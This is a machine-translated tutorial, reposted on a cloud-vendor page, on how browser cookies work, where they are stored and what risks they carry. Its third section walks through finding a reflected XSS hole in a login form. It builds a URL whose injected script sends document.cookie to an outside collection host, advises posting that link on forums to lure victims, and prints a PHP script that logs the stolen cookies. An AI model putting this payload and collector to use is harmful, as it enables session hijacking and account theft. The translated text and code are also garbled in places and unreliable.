A comprehensive understanding of cookie transfer procedures, programming implementation, and security issues

Source: Internet
Author: User
Cookie is the meaning of a small dessert in English, and we can always see in the browser how food will be related to the browser? When you browse a previously visited website, it may appear on the webpage: Hello XX. It feels very kind, just like eating a small dessert. This is actually implemented by accessing a file in your host. Therefore, this file is called a cookie. Do you want to fully understand cookies? Let's take a look at the following!

1. Learn more about Cookie Applicability: beginners

Cookie is a small text file stored on your machine when you browse a website. It records your user ID, password, browsed web page, stay time, and other information. When you come to the website again, the website reads cookies and obtains your related information, for example, you are welcome to the text on the page, or you do not need to enter your ID or password to log on directly. You can select "set/view files" on the "General" tab of "tools/Internet Options" of IE to view all the cookies saved to your computer. These files are generally named in the format of user @ domain. User is your local user name, and domain is the domain name of the accessed website. If you use the Netscape browser, it is stored in "C:/ProgramFiles/Netscape/users/". Unlike IE, Netscape uses a cookie file to record cookies of all websites.
  
To ensure Internet security, we need to set cookies appropriately. Open the "privacy" tab in "tools/Internet Options" (note that this setting only exists in ie6.0, for other versions of Internet Explorer, you can click "Custom Level" in the "Security" tab of "tools/Internet Options" to adjust the cookie security level. In general, you can adjust the slider to the "medium" or "high" position. Most Forum sites require cookie information. If you never go to these sites, you can change the security level to "block all cookies ". To prohibit cookies of individual websites, click the "edit" button to add the websites to be blocked to the list. In the "advanced" button option, you can set the first-party cookie and the third-party cookie. The first-party cookie is the cookie of the website you are browsing, A third-party cookie is a cookie sent to you by a website that is not being browsed. You must select "reject" for a third-party cookie. To save the cookie, you can use the "Import and Export" function of IE to open "file/import and export" and follow the prompts.

Most of the content in cookies is encrypted, so it seems that they are only meaningless combinations of letters and numbers, and only the CGI handler on the server can understand their true meaning. Through some software, we can view more content, and use the cookie pal software to view cookie information, as shown in figure 2. It provides the server, expires, name, value, and other options for us. The server is the website that stores cookies. expires records the Cookie's time and life cycle, the name and value fields are specific data (this article provides a detailed description of the software in section 10th, version 42nd ).
: Http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe.
  
Ii. Cookie Transfer Process intended for intermediate readers
  
When a Web site URL is entered in the address bar of the browser, the browser sends a request to the web site to read the web page and displays the result on the display. At this time, the webpage looks for the cookie file set for the Amazon website on your computer. if it finds the cookie file, the browser will send the data in the cookie file along with the previously entered URL to the Amazon server. When the server receives the cookie data, it will retrieve your ID, shopping records, personal preferences, and other information in its database, and record new content, add to database and cookie files. If no cookie is detected or your cookie information does not match the information in the database, it indicates that you are browsing the website for the first time. The CGI program on the server will create a new ID for you, and save it to the database.
Cookies are transmitted using the HTTP header information in the webpage code. Each webpage request of the browser can be transmitted along with the cookie. For example, the browser can open or refresh the webpage. The server adds the cookie to the HTTP header of the webpage. When the webpage data is sent back to your browser, the browser will choose whether to save the data based on the cookie settings on your computer. If the browser does not allow cookies to be saved, the data disappears after the browser is closed. The cookie storage time on the computer is different. These are determined by the different settings of the server. Cookie has an expires (Validity Period) attribute, which determines the cookie retention time. The server can change the cookie retention time by setting the value of the expires field. If this attribute is not set, the cookie is valid only during Webpage Browsing and closes the browser. These cookies automatically disappear. This is the case for most websites. Generally, a cookie contains the following fields: Server, expires, name, and value. Only the name and value fields are useful to the server, expires and other fields are only used to tell the browser how to handle these cookies.

3. Cookie programming target: Senior readers
  
Most Web Programming Languages Support cookies. Such as JavaScript, VBScript, Delphi, ASP, SQL, PHP, and C. In these object-oriented programming languages, the use of cookie programming is basically similar. The general process is to create a cookie object first ), then, the control function is used to assign values, read values, and write values to cookies. Then, how can we use code to obtain sensitive information in cookies of other users? The following is a brief introduction.
This method involves two steps: first, you need to locate the website where you need to collect cookies, analyze them, and construct a URL. Then, you need to compile the PHP code for collecting cookies, and put it on a website that you can control. When the visitor clicks the URL you constructed, the PHP code can be executed. The following describes the implementation process.

1. Analyze and construct a URL

First open the website we want to collect cookies, Here suppose is http://www.XXX.net, login website input username "<A1>" (without quotation marks), the data analysis packet capture, get like "http://www.XXX.net/txl/login/login.pl? Username = <A1> & passwd = & OK. X = 28 & OK. y = 6, replace "<A1>" with "<SCRIPT> alert (document. cookie) </SCRIPT> "Try again; if the execution is successful, start constructing the URL:" http://www.XXX.net/txl/login/login.pl? Username = <SCRIPT> window. Open ("http://www.cbifamily.org/cbi.php? "% 2bdocument. Cookie) </SCRIPT> & passwd = & OK. x = 28 & OK. Y = 6 ". Http: // www.cbifamily.org/cbi.php?you can control a script on a certain website. Note that "% 2B" is the URL encoding of the symbol "+", because "+" is processed as a space. This URL can be published in the Forum to entice others to click.

2. Compile a PHP script

This script is used to collect cookie files. The specific content is as follows:

  
<? PHP
$ Info = getenv ("QUERY_STRING ");
If ($ info ){
$ Fp = fopen ("info.txt", "");
Fwrite ($ FP, $ info. "/N ");
Fclose ($ FP );
}
Header ("Location: http://www.XXX.net ");
?>

Iv. Cookie security problems applicable to: all readers who want to access the Internet safely

1. Cookie Spoofing

Cookies record the user's account ID, password, and other information. If it is transmitted online, it is usually encrypted using the MD5 method. In this way, even if the encrypted information is intercepted by some ulterior motives on the internet, it cannot be understood because it only displays meaningless letters and numbers. However, the problem is that the person who intercepts cookies does not need to know the meaning of these strings. They only need to submit others' cookies to the server and can pass the verification, they can pretend to be victims and log on to the website. This method is called Cookie spoofing. Cookie spoofing is implemented only when the server verification program has a vulnerability and the impersonator needs to obtain the cookie information of the impersonator. At present, it is very difficult for the website's validators to exclude all illegal logins. For example, the language used to compile the validators may have vulnerabilities. In addition, it is easy to obtain others' cookies. You can write a short piece of code in a language that supports cookies (For details, refer to 3). You only need to put this code on the network, all cookies can be collected. If a Forum allows HTML code or allows flash tags, you can use these technologies to collect cookie code and put it in the forum. Then, you can give the post an attractive topic and write interesting content, A large number of cookies can be collected soon. On the Forum, many people have stolen their passwords. As for how to prevent it, there is no specific medicine yet. We can only use the usual protection methods. Do not use important passwords in forums, or use the IE function to automatically save passwords, and try not to log on to a website that does not know the details.

2. flash code hazards

Flash has a geturl () function. Flash can use this function to automatically open a specified webpage. Therefore, it may direct you to a website containing malicious code. For example, when you enjoy the exquisite Flash animation on your computer, the code in the animation frame may have been quietly connected to the Internet, and opened a very small page containing special code. This page can collect your cookies or do other things, such as planting trojans on your machine or even formatting your hard disk. For flash, websites cannot be banned because it is an internal action of Flash files. What we can do is try to open the firewall if you are browsing locally. If the firewall prompts that packets sent to the outside are not known to you, it is best to disable it. If you want to enjoy it on the internet, you 'd better find some well-known big websites.
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.